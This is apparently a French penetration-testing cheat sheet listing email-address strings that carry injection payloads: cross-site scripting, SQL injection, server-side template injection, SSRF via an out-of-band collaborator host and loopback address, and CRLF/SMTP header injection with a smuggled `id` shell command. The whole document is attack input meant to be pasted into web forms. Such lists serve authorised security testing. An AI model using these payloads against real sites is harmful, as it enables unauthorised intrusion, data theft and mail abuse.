# Injections dans emails ## XSS ``` test+()@mail.xyz test@mail().xyz ""@mail.xyz "hello

"@mail.xyz ["');alert('XSS');//"]@mail.xyz ``` ## SQLi ``` "'OR 1=1--'"@mail.xyz ``` ## SSTI ``` "<%=7*7 %>"@mail.xyz test+(${{7*7}})@mail.xyz test+${{7*7}}@mail.xyz ``` ## SSRF ``` test@mail.xyz.burpcollab.net test@[127.0.0.1] ``` ## Header injection ``` "%0D%0AContent-Length:%200%0D%0A%OD%0A"@mail.xyz "test@mail.xyz>\r\nRCPT TO:toto@victim.com username+${7*7}{{7*7}}`id`|'or''='mail.xyz ```